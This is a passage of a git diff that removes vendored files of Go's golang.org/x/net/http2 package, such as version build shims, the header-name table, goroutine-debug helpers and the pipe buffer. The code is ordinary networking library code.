hdec.SetEmitEnabled(false) - mh.Truncated = true - return - } - remainSize -= size - - mh.Fields = append(mh.Fields, hf) - }) - // Lose reference to MetaHeadersFrame: - defer hdec.SetEmitFunc(func(hf hpack.HeaderField) {}) - - var hc headersOrContinuation = hf - for { - frag := hc.HeaderBlockFragment() - if _, err := hdec.Write(frag); err != nil { - return nil, ConnectionError(ErrCodeCompression) - } - - if hc.HeadersEnded() { - break - } - if f, err := fr.ReadFrame(); err != nil { - return nil, err - } else { - hc = f.(*ContinuationFrame) // guaranteed by checkFrameOrder - } - } - - mh.HeadersFrame.headerFragBuf = nil - mh.HeadersFrame.invalidate() - - if err := hdec.Close(); err != nil { - return nil, ConnectionError(ErrCodeCompression) - } - if invalid != nil { - fr.errDetail = invalid - if VerboseLogs { - log.Printf("http2: invalid header: %v", invalid) - } - return nil, StreamError{mh.StreamID, ErrCodeProtocol, invalid} - } - if err := mh.checkPseudos(); err != nil { - fr.errDetail = err - if VerboseLogs { - log.Printf("http2: invalid pseudo headers: %v", err) - } - return nil, StreamError{mh.StreamID, ErrCodeProtocol, err} - } - return mh, nil -} - -func summarizeFrame(f Frame) string { - var buf bytes.Buffer - f.Header().writeDebug(&buf) - switch f := f.(type) { - case *SettingsFrame: - n := 0 - f.ForeachSetting(func(s Setting) error { - n++ - if n == 1 { - buf.WriteString(", settings:") - } - fmt.Fprintf(&buf, " %v=%v,", s.ID, s.Val) - return nil - }) - if n > 0 { - buf.Truncate(buf.Len() - 1) // remove trailing comma - } - case *DataFrame: - data := f.Data() - const max = 256 - if len(data) > max { - data = data[:max] - } - fmt.Fprintf(&buf, " data=%q", data) - if len(f.Data()) > max { - fmt.Fprintf(&buf, " (%d bytes omitted)", len(f.Data())-max) - } - case *WindowUpdateFrame: - if f.StreamID == 0 { - buf.WriteString(" (conn)") 
- } - fmt.Fprintf(&buf, " incr=%v", f.Increment) - case *PingFrame: - fmt.Fprintf(&buf, " ping=%q", f.Data[:]) - case *GoAwayFrame: - fmt.Fprintf(&buf, " LastStreamID=%v ErrCode=%v Debug=%q", - f.LastStreamID, f.ErrCode, f.debugData) - case *RSTStreamFrame: - fmt.Fprintf(&buf, " ErrCode=%v", f.ErrCode) - } - return buf.String() -} diff --git a/vendor/golang.org/x/net/http2/go16.go b/vendor/golang.org/x/net/http2/go16.go deleted file mode 100644 index 00b2e9e3..00000000 --- a/vendor/golang.org/x/net/http2/go16.go +++ /dev/null @@ -1,16 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build go1.6 - -package http2 - -import ( - "net/http" - "time" -) - -func transportExpectContinueTimeout(t1 *http.Transport) time.Duration { - return t1.ExpectContinueTimeout -} diff --git a/vendor/golang.org/x/net/http2/go17.go b/vendor/golang.org/x/net/http2/go17.go deleted file mode 100644 index 47b7fae0..00000000 --- a/vendor/golang.org/x/net/http2/go17.go +++ /dev/null @@ -1,106 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build go1.7 - -package http2 - -import ( - "context" - "net" - "net/http" - "net/http/httptrace" - "time" -) - -type contextContext interface { - context.Context -} - -func serverConnBaseContext(c net.Conn, opts *ServeConnOpts) (ctx contextContext, cancel func()) { - ctx, cancel = context.WithCancel(context.Background()) - ctx = context.WithValue(ctx, http.LocalAddrContextKey, c.LocalAddr()) - if hs := opts.baseConfig(); hs != nil { - ctx = context.WithValue(ctx, http.ServerContextKey, hs) - } - return -} - -func contextWithCancel(ctx contextContext) (_ contextContext, cancel func()) { - return context.WithCancel(ctx) -} - -func requestWithContext(req *http.Request, ctx contextContext) *http.Request { - return req.WithContext(ctx) -} - -type clientTrace httptrace.ClientTrace - -func reqContext(r *http.Request) context.Context { return r.Context() } - -func (t *Transport) idleConnTimeout() time.Duration { - if t.t1 != nil { - return t.t1.IdleConnTimeout - } - return 0 -} - -func setResponseUncompressed(res *http.Response) { res.Uncompressed = true } - -func traceGotConn(req *http.Request, cc *ClientConn) { - trace := httptrace.ContextClientTrace(req.Context()) - if trace == nil || trace.GotConn == nil { - return - } - ci := httptrace.GotConnInfo{Conn: cc.tconn} - cc.mu.Lock() - ci.Reused = cc.nextStreamID > 1 - ci.WasIdle = len(cc.streams) == 0 && ci.Reused - if ci.WasIdle && !cc.lastActive.IsZero() { - ci.IdleTime = time.Now().Sub(cc.lastActive) - } - cc.mu.Unlock() - - trace.GotConn(ci) -} - -func traceWroteHeaders(trace *clientTrace) { - if trace != nil && trace.WroteHeaders != nil { - trace.WroteHeaders() - } -} - -func traceGot100Continue(trace *clientTrace) { - if trace != nil && trace.Got100Continue != nil { - trace.Got100Continue() - } -} - -func traceWait100Continue(trace *clientTrace) { - if trace != nil && trace.Wait100Continue != nil { - trace.Wait100Continue() - } -} - -func traceWroteRequest(trace *clientTrace, err error) { - if trace != nil && trace.WroteRequest != nil { - trace.WroteRequest(httptrace.WroteRequestInfo{Err: err}) - } -} - -func traceFirstResponseByte(trace *clientTrace) { - if trace != nil && trace.GotFirstResponseByte != nil { - trace.GotFirstResponseByte() - } -} - -func requestTrace(req 
*http.Request) *clientTrace { - trace := httptrace.ContextClientTrace(req.Context()) - return (*clientTrace)(trace) -} - -// Ping sends a PING frame to the server and waits for the ack. -func (cc *ClientConn) Ping(ctx context.Context) error { - return cc.ping(ctx) -} diff --git a/vendor/golang.org/x/net/http2/go17_not18.go b/vendor/golang.org/x/net/http2/go17_not18.go deleted file mode 100644 index b4c52ece..00000000 --- a/vendor/golang.org/x/net/http2/go17_not18.go +++ /dev/null @@ -1,36 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build go1.7,!go1.8 - -package http2 - -import "crypto/tls" - -// temporary copy of Go 1.7's private tls.Config.clone: -func cloneTLSConfig(c *tls.Config) *tls.Config { - return &tls.Config{ - Rand: c.Rand, - Time: c.Time, - Certificates: c.Certificates, - NameToCertificate: c.NameToCertificate, - GetCertificate: c.GetCertificate, - RootCAs: c.RootCAs, - NextProtos: c.NextProtos, - ServerName: c.ServerName, - ClientAuth: c.ClientAuth, - ClientCAs: c.ClientCAs, - InsecureSkipVerify: c.InsecureSkipVerify, - CipherSuites: c.CipherSuites, - PreferServerCipherSuites: c.PreferServerCipherSuites, - SessionTicketsDisabled: c.SessionTicketsDisabled, - SessionTicketKey: c.SessionTicketKey, - ClientSessionCache: c.ClientSessionCache, - MinVersion: c.MinVersion, - MaxVersion: c.MaxVersion, - CurvePreferences: c.CurvePreferences, - DynamicRecordSizingDisabled: c.DynamicRecordSizingDisabled, - Renegotiation: c.Renegotiation, - } -} diff --git a/vendor/golang.org/x/net/http2/go18.go b/vendor/golang.org/x/net/http2/go18.go deleted file mode 100644 index 4f30d228..00000000 --- a/vendor/golang.org/x/net/http2/go18.go +++ /dev/null @@ -1,56 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build go1.8 - -package http2 - -import ( - "crypto/tls" - "io" - "net/http" -) - -func cloneTLSConfig(c *tls.Config) *tls.Config { - c2 := c.Clone() - c2.GetClientCertificate = c.GetClientCertificate // golang.org/issue/19264 - return c2 -} - -var _ http.Pusher = (*responseWriter)(nil) - -// Push implements http.Pusher. -func (w *responseWriter) Push(target string, opts *http.PushOptions) error { - internalOpts := pushOptions{} - if opts != nil { - internalOpts.Method = opts.Method - internalOpts.Header = opts.Header - } - return w.push(target, internalOpts) -} - -func configureServer18(h1 *http.Server, h2 *Server) error { - if h2.IdleTimeout == 0 { - if h1.IdleTimeout != 0 { - h2.IdleTimeout = h1.IdleTimeout - } else { - h2.IdleTimeout = h1.ReadTimeout - } - } - return nil -} - -func shouldLogPanic(panicValue interface{}) bool { - return panicValue != nil && panicValue != http.ErrAbortHandler -} - -func reqGetBody(req *http.Request) func() (io.ReadCloser, error) { - return req.GetBody -} - -func reqBodyIsNoBody(body io.ReadCloser) bool { - return body == http.NoBody -} - -func go18httpNoBody() io.ReadCloser { return http.NoBody } // for tests only diff --git a/vendor/golang.org/x/net/http2/go19.go b/vendor/golang.org/x/net/http2/go19.go deleted file mode 100644 index 38124ba5..00000000 --- a/vendor/golang.org/x/net/http2/go19.go +++ /dev/null @@ -1,16 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. 
- 
-// +build go1.9 
- 
-package http2 
- 
-import ( 
- "net/http" 
-) 
- 
-func configureServer19(s *http.Server, conf *Server) error { 
- s.RegisterOnShutdown(conf.state.startGracefulShutdown) 
- return nil 
-} 
diff --git a/vendor/golang.org/x/net/http2/gotrack.go b/vendor/golang.org/x/net/http2/gotrack.go 
deleted file mode 100644 
index 9933c9f8..00000000 
--- a/vendor/golang.org/x/net/http2/gotrack.go 
+++ /dev/null 
@@ -1,170 +0,0 @@ 
-// Copyright 2014 The Go Authors. All rights reserved. 
-// Use of this source code is governed by a BSD-style 
-// license that can be found in the LICENSE file. 
- 
-// Defensive debug-only utility to track that functions run on the 
-// goroutine that they're supposed to. 
- 
-package http2 
- 
-import ( 
- "bytes" 
- "errors" 
- "fmt" 
- "os" 
- "runtime" 
- "strconv" 
- "sync" 
-) 
- 
-var DebugGoroutines = os.Getenv("DEBUG_HTTP2_GOROUTINES") == "1" 
- 
-type goroutineLock uint64 
- 
-func newGoroutineLock() goroutineLock { 
- if !DebugGoroutines { 
- return 0 
- } 
- return goroutineLock(curGoroutineID()) 
-} 
- 
-func (g goroutineLock) check() { 
- if !DebugGoroutines { 
- return 
- } 
- if curGoroutineID() != uint64(g) { 
- panic("running on the wrong goroutine") 
- } 
-} 
- 
-func (g goroutineLock) checkNotOn() { 
- if !DebugGoroutines { 
- return 
- } 
- if curGoroutineID() == uint64(g) { 
- panic("running on the wrong goroutine") 
- } 
-} 
- 
-var goroutineSpace = []byte("goroutine ") 
- 
-func curGoroutineID() uint64 { 
- bp := littleBuf.Get().(*[]byte) 
- defer littleBuf.Put(bp) 
- b := *bp 
- b = b[:runtime.Stack(b, false)] 
- // Parse the 4707 out of "goroutine 4707 [" 
- b = bytes.TrimPrefix(b, goroutineSpace) 
- i := bytes.IndexByte(b, ' ') 
- if i < 0 { 
- panic(fmt.Sprintf("No space found in %q", b)) 
- } 
- b = b[:i] 
- n, err := parseUintBytes(b, 10, 64) 
- if err != nil { 
- panic(fmt.Sprintf("Failed to parse goroutine ID out of %q: %v", b, err)) 
- } 
- return n 
-} 
- 
-var littleBuf = sync.Pool{ 
- New: func() interface{} { 
- buf := make([]byte, 64) 
- return &buf 
- }, 
-} 
- 
-// parseUintBytes is like strconv.ParseUint, but using a []byte. 
-func parseUintBytes(s []byte, base int, bitSize int) (n uint64, err error) { 
- var cutoff, maxVal uint64 
- 
- if bitSize == 0 { 
- bitSize = int(strconv.IntSize) 
- } 
- 
- s0 := s 
- switch { 
- case len(s) < 1: 
- err = strconv.ErrSyntax 
- goto Error 
- 
- case 2 <= base && base <= 36: 
- // valid base; nothing to do 
- 
- case base == 0: 
- // Look for octal, hex prefix. 
- switch { 
- case s[0] == '0' && len(s) > 1 && (s[1] == 'x' || s[1] == 'X'): 
- base = 16 
- s = s[2:] 
- if len(s) < 1 { 
- err = strconv.ErrSyntax 
- goto Error 
- } 
- case s[0] == '0': 
- base = 8 
- default: 
- base = 10 
- } 
- 
- default: 
- err = errors.New("invalid base " + strconv.Itoa(base)) 
- goto Error 
- } 
- 
- n = 0 
- cutoff = cutoff64(base) 
- maxVal = 1<<uint(bitSize) - 1 
- 
- for i := 0; i < len(s); i++ { 
- var v byte 
- d := s[i] 
- switch { 
- case '0' <= d && d <= '9': 
- v = d - '0' 
- case 'a' <= d && d <= 'z': 
- v = d - 'a' + 10 
- case 'A' <= d && d <= 'Z': 
- v = d - 'A' + 10 
- default: 
- n = 0 
- err = strconv.ErrSyntax 
- goto Error 
- } 
- if int(v) >= base { 
- n = 0 
- err = strconv.ErrSyntax 
- goto Error 
- } 
- 
- if n >= cutoff { 
- // n*base overflows 
- n = 1<<64 - 1 
- err = strconv.ErrRange 
- goto Error 
- } 
- n *= uint64(base) 
- 
- n1 := n + uint64(v) 
- if n1 < n || n1 > maxVal { 
- // n+v overflows 
- n = 1<<64 - 1 
- err = strconv.ErrRange 
- goto Error 
- } 
- n = n1 
- } 
- 
- return n, nil 
- 
-Error: 
- return n, &strconv.NumError{Func: "ParseUint", Num: string(s0), Err: err} 
-} 
- 
-// Return the first number n such that n*base >= 1<<64. 
-func cutoff64(base int) uint64 { - if base < 2 { - return 0 - } - return (1<<64-1)/uint64(base) + 1 -} diff --git a/vendor/golang.org/x/net/http2/headermap.go b/vendor/golang.org/x/net/http2/headermap.go deleted file mode 100644 index c2805f6a..00000000 --- a/vendor/golang.org/x/net/http2/headermap.go +++ /dev/null @@ -1,78 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "net/http" - "strings" -) - -var ( - commonLowerHeader = map[string]string{} // Go-Canonical-Case -> lower-case - commonCanonHeader = map[string]string{} // lower-case -> Go-Canonical-Case -) - -func init() { - for _, v := range []string{ - "accept", - "accept-charset", - "accept-encoding", - "accept-language", - "accept-ranges", - "age", - "access-control-allow-origin", - "allow", - "authorization", - "cache-control", - "content-disposition", - "content-encoding", - "content-language", - "content-length", - "content-location", - "content-range", - "content-type", - "cookie", - "date", - "etag", - "expect", - "expires", - "from", - "host", - "if-match", - "if-modified-since", - "if-none-match", - "if-unmodified-since", - "last-modified", - "link", - "location", - "max-forwards", - "proxy-authenticate", - "proxy-authorization", - "range", - "referer", - "refresh", - "retry-after", - "server", - "set-cookie", - "strict-transport-security", - "trailer", - "transfer-encoding", - "user-agent", - "vary", - "via", - "www-authenticate", - } { - chk := http.CanonicalHeaderKey(v) - commonLowerHeader[chk] = v - commonCanonHeader[v] = chk - } -} - -func lowerHeader(v string) string { - if s, ok := commonLowerHeader[v]; ok { - return s - } - return strings.ToLower(v) -} diff --git a/vendor/golang.org/x/net/http2/http2.go b/vendor/golang.org/x/net/http2/http2.go deleted file mode 100644 index d565f40e..00000000 --- a/vendor/golang.org/x/net/http2/http2.go +++ /dev/null @@ -1,391 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// Package http2 implements the HTTP/2 protocol. -// -// This package is low-level and intended to be used directly by very -// few people. Most users will use it indirectly through the automatic -// use by the net/http package (from Go 1.6 and later). -// For use in earlier Go versions see ConfigureServer. (Transport support -// requires Go 1.6 or later) -// -// See https://http2.github.io/ for more information on HTTP/2. -// -// See https://http2.golang.org/ for a test server running this code. -// -package http2 // import "golang.org/x/net/http2" - -import ( - "bufio" - "crypto/tls" - "errors" - "fmt" - "io" - "net/http" - "os" - "sort" - "strconv" - "strings" - "sync" - - "golang.org/x/net/lex/httplex" -) - -var ( - VerboseLogs bool - logFrameWrites bool - logFrameReads bool - inTests bool -) - -func init() { - e := os.Getenv("GODEBUG") - if strings.Contains(e, "http2debug=1") { - VerboseLogs = true - } - if strings.Contains(e, "http2debug=2") { - VerboseLogs = true - logFrameWrites = true - logFrameReads = true - } -} - -const ( - // ClientPreface is the string that must be sent by new - // connections from clients. 
- ClientPreface = "PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n" - - // SETTINGS_MAX_FRAME_SIZE default - // http://http2.github.io/http2-spec/#rfc.section.6.5.2 - initialMaxFrameSize = 16384 - - // NextProtoTLS is the NPN/ALPN protocol negotiated during - // HTTP/2's TLS setup. - NextProtoTLS = "h2" - - // http://http2.github.io/http2-spec/#SettingValues - initialHeaderTableSize = 4096 - - initialWindowSize = 65535 // 6.9.2 Initial Flow Control Window Size - - defaultMaxReadFrameSize = 1 << 20 -) - -var ( - clientPreface = []byte(ClientPreface) -) - -type streamState int - -// HTTP/2 stream states. -// -// See http://tools.ietf.org/html/rfc7540#section-5.1. -// -// For simplicity, the server code merges "reserved (local)" into -// "half-closed (remote)". This is one less state transition to track. -// The only downside is that we send PUSH_PROMISEs slightly less -// liberally than allowable. More discussion here: -// https://lists.w3.org/Archives/Public/ietf-http-wg/2016JulSep/0599.html -// -// "reserved (remote)" is omitted since the client code does not -// support server push. -const ( - stateIdle streamState = iota - stateOpen - stateHalfClosedLocal - stateHalfClosedRemote - stateClosed -) - -var stateName = [...]string{ - stateIdle: "Idle", - stateOpen: "Open", - stateHalfClosedLocal: "HalfClosedLocal", - stateHalfClosedRemote: "HalfClosedRemote", - stateClosed: "Closed", -} - -func (st streamState) String() string { - return stateName[st] -} - -// Setting is a setting parameter: which setting it is, and its value. -type Setting struct { - // ID is which setting is being set. - // See http://http2.github.io/http2-spec/#SettingValues - ID SettingID - - // Val is the value. - Val uint32 -} - -func (s Setting) String() string { - return fmt.Sprintf("[%v = %d]", s.ID, s.Val) -} - -// Valid reports whether the setting is valid. -func (s Setting) Valid() error { - // Limits and error codes from 6.5.2 Defined SETTINGS Parameters - switch s.ID { - case SettingEnablePush: - if s.Val != 1 && s.Val != 0 { - return ConnectionError(ErrCodeProtocol) - } - case SettingInitialWindowSize: - if s.Val > 1<<31-1 { - return ConnectionError(ErrCodeFlowControl) - } - case SettingMaxFrameSize: - if s.Val < 16384 || s.Val > 1<<24-1 { - return ConnectionError(ErrCodeProtocol) - } - } - return nil -} - -// A SettingID is an HTTP/2 setting as defined in -// http://http2.github.io/http2-spec/#iana-settings -type SettingID uint16 - -const ( - SettingHeaderTableSize SettingID = 0x1 - SettingEnablePush SettingID = 0x2 - SettingMaxConcurrentStreams SettingID = 0x3 - SettingInitialWindowSize SettingID = 0x4 - SettingMaxFrameSize SettingID = 0x5 - SettingMaxHeaderListSize SettingID = 0x6 -) - -var settingName = map[SettingID]string{ - SettingHeaderTableSize: "HEADER_TABLE_SIZE", - SettingEnablePush: "ENABLE_PUSH", - SettingMaxConcurrentStreams: "MAX_CONCURRENT_STREAMS", - SettingInitialWindowSize: "INITIAL_WINDOW_SIZE", - SettingMaxFrameSize: "MAX_FRAME_SIZE", - SettingMaxHeaderListSize: "MAX_HEADER_LIST_SIZE", -} - -func (s SettingID) String() string { - if v, ok := settingName[s]; ok { - return v - } - return fmt.Sprintf("UNKNOWN_SETTING_%d", uint16(s)) -} - -var ( - errInvalidHeaderFieldName = errors.New("http2: invalid header field name") - errInvalidHeaderFieldValue = errors.New("http2: invalid header field value") -) - -// validWireHeaderFieldName reports whether v is a valid header field -// name (key). See httplex.ValidHeaderName for the base rules. 
-// -// Further, http2 says: -// "Just as in HTTP/1.x, header field names are strings of ASCII -// characters that are compared in a case-insensitive -// fashion. However, header field names MUST be converted to -// lowercase prior to their encoding in HTTP/2. " -func validWireHeaderFieldName(v string) bool { - if len(v) == 0 { - return false - } - for _, r := range v { - if !httplex.IsTokenRune(r) { - return false - } - if 'A' <= r && r <= 'Z' { - return false - } - } - return true -} - -var httpCodeStringCommon = map[int]string{} // n -> strconv.Itoa(n) - -func init() { - for i := 100; i <= 999; i++ { - if v := http.StatusText(i); v != "" { - httpCodeStringCommon[i] = strconv.Itoa(i) - } - } -} - -func httpCodeString(code int) string { - if s, ok := httpCodeStringCommon[code]; ok { - return s - } - return strconv.Itoa(code) -} - -// from pkg io -type stringWriter interface { - WriteString(s string) (n int, err error) -} - -// A gate lets two goroutines coordinate their activities. -type gate chan struct{} - -func (g gate) Done() { g <- struct{}{} } -func (g gate) Wait() { <-g } - -// A closeWaiter is like a sync.WaitGroup but only goes 1 to 0 (open to closed). -type closeWaiter chan struct{} - -// Init makes a closeWaiter usable. -// It exists because so a closeWaiter value can be placed inside a -// larger struct and have the Mutex and Cond's memory in the same -// allocation. -func (cw *closeWaiter) Init() { - *cw = make(chan struct{}) -} - -// Close marks the closeWaiter as closed and unblocks any waiters. -func (cw closeWaiter) Close() { - close(cw) -} - -// Wait waits for the closeWaiter to become closed. -func (cw closeWaiter) Wait() { - <-cw -} - -// bufferedWriter is a buffered writer that writes to w. -// Its buffered writer is lazily allocated as needed, to minimize -// idle memory usage with many connections. -type bufferedWriter struct { - w io.Writer // immutable - bw *bufio.Writer // non-nil when data is buffered -} - -func newBufferedWriter(w io.Writer) *bufferedWriter { - return &bufferedWriter{w: w} -} - -// bufWriterPoolBufferSize is the size of bufio.Writer's -// buffers created using bufWriterPool. -// -// TODO: pick a less arbitrary value? this is a bit under -// (3 x typical 1500 byte MTU) at least. Other than that, -// not much thought went into it. -const bufWriterPoolBufferSize = 4 << 10 - -var bufWriterPool = sync.Pool{ - New: func() interface{} { - return bufio.NewWriterSize(nil, bufWriterPoolBufferSize) - }, -} - -func (w *bufferedWriter) Available() int { - if w.bw == nil { - return bufWriterPoolBufferSize - } - return w.bw.Available() -} - -func (w *bufferedWriter) Write(p []byte) (n int, err error) { - if w.bw == nil { - bw := bufWriterPool.Get().(*bufio.Writer) - bw.Reset(w.w) - w.bw = bw - } - return w.bw.Write(p) -} - -func (w *bufferedWriter) Flush() error { - bw := w.bw - if bw == nil { - return nil - } - err := bw.Flush() - bw.Reset(nil) - bufWriterPool.Put(bw) - w.bw = nil - return err -} - -func mustUint31(v int32) uint32 { - if v < 0 || v > 2147483647 { - panic("out of range") - } - return uint32(v) -} - -// bodyAllowedForStatus reports whether a given response status code -// permits a body. See RFC 2616, section 4.4. 
-func bodyAllowedForStatus(status int) bool { - switch { - case status >= 100 && status <= 199: - return false - case status == 204: - return false - case status == 304: - return false - } - return true -} - -type httpError struct { - msg string - timeout bool -} - -func (e *httpError) Error() string { return e.msg } -func (e *httpError) Timeout() bool { return e.timeout } -func (e *httpError) Temporary() bool { return true } - -var errTimeout error = &httpError{msg: "http2: timeout awaiting response headers", timeout: true} - -type connectionStater interface { - ConnectionState() tls.ConnectionState -} - -var sorterPool = sync.Pool{New: func() interface{} { return new(sorter) }} - -type sorter struct { - v []string // owned by sorter -} - -func (s *sorter) Len() int { return len(s.v) } -func (s *sorter) Swap(i, j int) { s.v[i], s.v[j] = s.v[j], s.v[i] } -func (s *sorter) Less(i, j int) bool { return s.v[i] < s.v[j] } - -// Keys returns the sorted keys of h. -// -// The returned slice is only valid until s used again or returned to -// its pool. -func (s *sorter) Keys(h http.Header) []string { - keys := s.v[:0] - for k := range h { - keys = append(keys, k) - } - s.v = keys - sort.Sort(s) - return keys -} - -func (s *sorter) SortStrings(ss []string) { - // Our sorter works on s.v, which sorter owns, so - // stash it away while we sort the user's buffer. - save := s.v - s.v = ss - sort.Sort(s) - s.v = save -} - -// validPseudoPath reports whether v is a valid :path pseudo-header -// value. It must be either: -// -// *) a non-empty string starting with '/' -// *) the string '*', for OPTIONS requests. -// -// For now this is only used a quick check for deciding when to clean -// up Opaque URLs before sending requests from the Transport. -// See golang.org/issue/16847 -// -// We used to enforce that the path also didn't start with "//", but -// Google's GFE accepts such paths and Chrome sends them, so ignore -// that part of the spec. See golang.org/issue/19103. -func validPseudoPath(v string) bool { - return (len(v) > 0 && v[0] == '/') || v == "*" -} diff --git a/vendor/golang.org/x/net/http2/not_go16.go b/vendor/golang.org/x/net/http2/not_go16.go deleted file mode 100644 index 508cebcc..00000000 --- a/vendor/golang.org/x/net/http2/not_go16.go +++ /dev/null @@ -1,21 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build !go1.6 - -package http2 - -import ( - "net/http" - "time" -) - -func configureTransport(t1 *http.Transport) (*Transport, error) { - return nil, errTransportVersion -} - -func transportExpectContinueTimeout(t1 *http.Transport) time.Duration { - return 0 - -} diff --git a/vendor/golang.org/x/net/http2/not_go17.go b/vendor/golang.org/x/net/http2/not_go17.go deleted file mode 100644 index 140434a7..00000000 --- a/vendor/golang.org/x/net/http2/not_go17.go +++ /dev/null @@ -1,87 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. 
- -// +build !go1.7 - -package http2 - -import ( - "crypto/tls" - "net" - "net/http" - "time" -) - -type contextContext interface { - Done() <-chan struct{} - Err() error -} - -type fakeContext struct{} - -func (fakeContext) Done() <-chan struct{} { return nil } -func (fakeContext) Err() error { panic("should not be called") } - -func reqContext(r *http.Request) fakeContext { - return fakeContext{} -} - -func setResponseUncompressed(res *http.Response) { - // Nothing. -} - -type clientTrace struct{} - -func requestTrace(*http.Request) *clientTrace { return nil } -func traceGotConn(*http.Request, *ClientConn) {} -func traceFirstResponseByte(*clientTrace) {} -func traceWroteHeaders(*clientTrace) {} -func traceWroteRequest(*clientTrace, error) {} -func traceGot100Continue(trace *clientTrace) {} -func traceWait100Continue(trace *clientTrace) {} - -func nop() {} - -func serverConnBaseContext(c net.Conn, opts *ServeConnOpts) (ctx contextContext, cancel func()) { - return nil, nop -} - -func contextWithCancel(ctx contextContext) (_ contextContext, cancel func()) { - return ctx, nop -} - -func requestWithContext(req *http.Request, ctx contextContext) *http.Request { - return req -} - -// temporary copy of Go 1.6's private tls.Config.clone: -func cloneTLSConfig(c *tls.Config) *tls.Config { - return &tls.Config{ - Rand: c.Rand, - Time: c.Time, - Certificates: c.Certificates, - NameToCertificate: c.NameToCertificate, - GetCertificate: c.GetCertificate, - RootCAs: c.RootCAs, - NextProtos: c.NextProtos, - ServerName: c.ServerName, - ClientAuth: c.ClientAuth, - ClientCAs: c.ClientCAs, - InsecureSkipVerify: c.InsecureSkipVerify, - CipherSuites: c.CipherSuites, - PreferServerCipherSuites: c.PreferServerCipherSuites, - SessionTicketsDisabled: c.SessionTicketsDisabled, - SessionTicketKey: c.SessionTicketKey, - ClientSessionCache: c.ClientSessionCache, - MinVersion: c.MinVersion, - MaxVersion: c.MaxVersion, - CurvePreferences: c.CurvePreferences, - } -} - -func (cc *ClientConn) Ping(ctx contextContext) error { - return cc.ping(ctx) -} - -func (t *Transport) idleConnTimeout() time.Duration { return 0 } diff --git a/vendor/golang.org/x/net/http2/not_go18.go b/vendor/golang.org/x/net/http2/not_go18.go deleted file mode 100644 index 6f8d3f86..00000000 --- a/vendor/golang.org/x/net/http2/not_go18.go +++ /dev/null @@ -1,29 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build !go1.8 - -package http2 - -import ( - "io" - "net/http" -) - -func configureServer18(h1 *http.Server, h2 *Server) error { - // No IdleTimeout to sync prior to Go 1.8. - return nil -} - -func shouldLogPanic(panicValue interface{}) bool { - return panicValue != nil -} - -func reqGetBody(req *http.Request) func() (io.ReadCloser, error) { - return nil -} - -func reqBodyIsNoBody(io.ReadCloser) bool { return false } - -func go18httpNoBody() io.ReadCloser { return nil } // for tests only diff --git a/vendor/golang.org/x/net/http2/not_go19.go b/vendor/golang.org/x/net/http2/not_go19.go deleted file mode 100644 index 5ae07726..00000000 --- a/vendor/golang.org/x/net/http2/not_go19.go +++ /dev/null @@ -1,16 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. 
- -// +build !go1.9 - -package http2 - -import ( - "net/http" -) - -func configureServer19(s *http.Server, conf *Server) error { - // not supported prior to go1.9 - return nil -} diff --git a/vendor/golang.org/x/net/http2/pipe.go b/vendor/golang.org/x/net/http2/pipe.go deleted file mode 100644 index a6140099..00000000 --- a/vendor/golang.org/x/net/http2/pipe.go +++ /dev/null @@ -1,163 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "errors" - "io" - "sync" -) - -// pipe is a goroutine-safe io.Reader/io.Writer pair. It's like -// io.Pipe except there are no PipeReader/PipeWriter halves, and the -// underlying buffer is an interface. (io.Pipe is always unbuffered) -type pipe struct { - mu sync.Mutex - c sync.Cond // c.L lazily initialized to &p.mu - b pipeBuffer // nil when done reading - err error // read error once empty. non-nil means closed. - breakErr error // immediate read error (caller doesn't see rest of b) - donec chan struct{} // closed on error - readFn func() // optional code to run in Read before error -} - -type pipeBuffer interface { - Len() int - io.Writer - io.Reader -} - -func (p *pipe) Len() int { - p.mu.Lock() - defer p.mu.Unlock() - if p.b == nil { - return 0 - } - return p.b.Len() -} - -// Read waits until data is available and copies bytes -// from the buffer into p. -func (p *pipe) Read(d []byte) (n int, err error) { - p.mu.Lock() - defer p.mu.Unlock() - if p.c.L == nil { - p.c.L = &p.mu - } - for { - if p.breakErr != nil { - return 0, p.breakErr - } - if p.b != nil && p.b.Len() > 0 { - return p.b.Read(d) - } - if p.err != nil { - if p.readFn != nil { - p.readFn() // e.g. copy trailers - p.readFn = nil // not sticky like p.err - } - p.b = nil - return 0, p.err - } - p.c.Wait() - } -} - -var errClosedPipeWrite = errors.New("write on closed buffer") - -// Write copies bytes from p into the buffer and wakes a reader. -// It is an error to write more data than the buffer can hold. -func (p *pipe) Write(d []byte) (n int, err error) { - p.mu.Lock() - defer p.mu.Unlock() - if p.c.L == nil { - p.c.L = &p.mu - } - defer p.c.Signal() - if p.err != nil { - return 0, errClosedPipeWrite - } - if p.breakErr != nil { - return len(d), nil // discard when there is no reader - } - return p.b.Write(d) -} - -// CloseWithError causes the next Read (waking up a current blocked -// Read if needed) to return the provided err after all data has been -// read. -// -// The error must be non-nil. -func (p *pipe) CloseWithError(err error) { p.closeWithError(&p.err, err, nil) } - -// BreakWithError causes the next Read (waking up a current blocked -// Read if needed) to return the provided err immediately, without -// waiting for unread data. -func (p *pipe) 